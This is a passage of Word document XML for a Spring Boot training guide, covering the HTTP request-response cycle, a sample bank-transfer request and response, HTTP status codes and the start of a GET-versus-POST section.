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160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0D9488"/>
          <w:spacing w:val="60"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">PROFESSIONAL TRAINING GUIDE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A2B4A"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
        <w:t xml:space="preserve">Spring Boot Actuator &amp;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="280"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A2B4A"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
        <w:t xml:space="preserve">Session Handling</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="0D9488" w:sz="4" w:space="1"/>
          <w:bottom w:val="single" w:color="0D9488" w:sz="4" w:space="1"/>
        </w:pBdr>
        <w:spacing w:before="120" w:after="120"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">From Ground Zero to Architect-Level Understanding</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A2B4A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Covers:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">✦  HTTP Request-Response Cycle</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">✦  GET vs POST — Deep Design Principles</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">✦  Stateful vs Stateless Applications</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">✦  Spring Session &amp; HttpSession API</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">✦  Local Storage &amp; Client-Side State</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">✦  Server-Side &amp; Client-Side Redirects · PRG Pattern</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">✦  Spring Boot Actuator — All Endpoints</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">✦  Health Checks · Custom Metrics · Security</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="94A3B8"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Instructor: Senior Java Backend Architect  |  30+ Years Industry Experience</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="94A3B8"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Certifications: Java, Oracle, SQL Server, MySQL, PostgreSQL</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>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0D9488" w:sz="6" w:space="4"/>
        </w:pBdr>
        <w:spacing w:before="400" w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A2B4A"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Module 1: Web Foundations</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Before we can understand Spring Boot Actuator, sessions, or any backend concept, we must build an unshakeable understanding of the web's fundamental communication model. Every backend concept we will study is built on top of what is described in this module.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="320" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A2B4A"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">1.1 The Request-Response Cycle</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A web application is essentially a conversation between two computers. The client (your browser or mobile app) sends a request, and the server (your Spring Boot application) sends back a response. This conversation follows a strict protocol called HTTP (HyperText Transfer Protocol).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thick" w:color="1E40AF" w:sz="16"/>
              <w:bottom w:val="single" w:color="1E40AF" w:sz="6"/>
              <w:right w:val="single" w:color="1E40AF" w:sz="6"/>
            </w:tcBorders>
            <w:shd w:fill="DBEAFE" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1E40AF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">💡  Analogy</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="334155"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">The Hotel Analogy: Imagine calling room service. You (the client) pick up the phone and ask for something (the request). Room service (the server) prepares it and brings it to you (the response). Each call is completely independent — room service has no memory of your previous calls unless they write it down somewhere.</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The 8 Steps of Every HTTP Request</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">User Action — The user types a URL, clicks a link, or submits a form in the browser.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Browser Builds HTTP Request — The browser constructs a structured message containing: a verb (GET/POST), a URL, headers (metadata), and optionally a body.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Network Transmission — The request travels over the internet as TCP/IP packets.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Web Server Receives — A web server (Nginx, Apache) or directly the embedded Tomcat in Spring Boot receives the request.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Filter Chain Processing — Spring's filter chain intercepts the request for security checks, logging, CORS, compression, etc.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">DispatcherServlet Routes — Spring's front controller reads the URL and routes it to the correct @Controller method.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Controller Executes — Your Java business logic runs. It may call services, repositories, and the database.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Response Sent Back — The server builds an HTTP Response (status code + headers + body) and sends it back to the browser.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thick" w:color="F59E0B" w:sz="16"/>
              <w:bottom w:val="single" w:color="F59E0B" w:sz="6"/>
              <w:right w:val="single" w:color="F59E0B" w:sz="6"/>
            </w:tcBorders>
            <w:shd w:fill="FEF3C7" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="F59E0B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">⚠️  Critical Security Insight</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="334155"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Critical Insight: The browser NEVER communicates directly with the database. It always communicates with the server. The server communicates with the database. This separation is fundamental to security — it means you control exactly what data is exposed.</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Anatomy of an HTTP Request</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">An HTTP request is like a formal business letter. It has a structured format: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POST /api/transfer HTTP/1.1</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Host: securebank.com</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Content-Type: application/json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Authorization: Bearer eyJhbGci...</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Cookie: JSESSIONID=a7f3b2c9d1e4f5</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"fromAccount": "ACC-001",</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"toAccount":   "ACC-002",</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"amount":      500.00</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Part</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6560"/>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Description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Request Line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Contains the HTTP verb (POST), the URL path (/api/transfer), and the protocol version (HTTP/1.1).</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Host Header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Tells the server which domain this request is for — important for servers hosting multiple domains.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Content-Type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Tells the server what format the body is in — application/json, application/x-www-form-urlencoded, etc.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Authorization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Carries authentication credentials — a Bearer token for JWT-based APIs.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Cookie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Automatically sent by the browser — contains the session ID (JSESSIONID) for stateful apps.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Body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The actual data being sent — only present in POST, PUT, PATCH requests, never in GET.</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Anatomy of an HTTP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HTTP/1.1 200 OK</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Content-Type: application/json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Set-Cookie: JSESSIONID=xyz123; HttpOnly; Secure; SameSite=Strict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"status": "success",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"confirmationNumber": "TXN-98765",</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"newBalance": 4500.00</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bl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The most important part of a response is the status code — it tells the browser whether the request succeeded or failed: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BD5E1" w:sz="1"/>
              <w:left w:val="single" w:color="CBD5E1" w:sz="1"/>
              <w:bottom w:val="single" w:color="CBD5E1" w:sz="1"/>
              <w:right w:val="single" w:color="CBD5E1" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="1A2B4A" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Status Code</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CBD5E1" w:sz="1"/>
              <w:left w:val="single" w:color="CBD5E1" w:sz="1"/>
              <w:bottom w:val="single" w:color="CBD5E1" w:sz="1"/>
              <w:right w:val="single" w:color="CBD5E1" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="1A2B4A" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Meaning</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5160"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CBD5E1" w:sz="1"/>
              <w:left w:val="single" w:color="CBD5E1" w:sz="1"/>
              <w:bottom w:val="single" w:color="CBD5E1" w:sz="1"/>
              <w:right w:val="single" w:color="CBD5E1" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="1A2B4A" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">When Used</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200 OK</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Request succeeded</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5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Successful GET or POST returning data</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201 Created</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Resource was created</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5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After a successful POST that creates a new entity</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302 Found</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Redirect to another URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5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Server-side redirect (PRG pattern)</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400 Bad Request</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Invalid input data</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5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Request body fails validation</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401 Unauthorized</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Not authenticated</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5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No valid session or token provided</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403 Forbidden</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Not authorized</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5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Authenticated but lacks permission</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404 Not Found</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Resource doesn't exist</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5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Wrong URL or deleted resource</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500 Internal Server Error</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Server crashed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5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Unhandled exception in your code</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503 Service Unavailable</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Server is down</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5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Returned by /actuator/health when DOWN</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="320" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A2B4A"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">1.2 HTTP Methods: GET vs POST</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Understanding when to use GET versus POST is not just a technical choice — it is a design principle with profound implications for security, caching, bookmarking, and correctness. Many beginners treat this as an arbitrary choice, but each method has a strict semantic contract.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0D9488"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The GET Method</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">GET is the method for retrieval. It should be used exclusively when you are asking the server for data and you are not changing anything on the server.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Key characteristics of GET:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Parameters are carried in the URL as query strings: GET /search?query=laptop&amp;sort=price</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
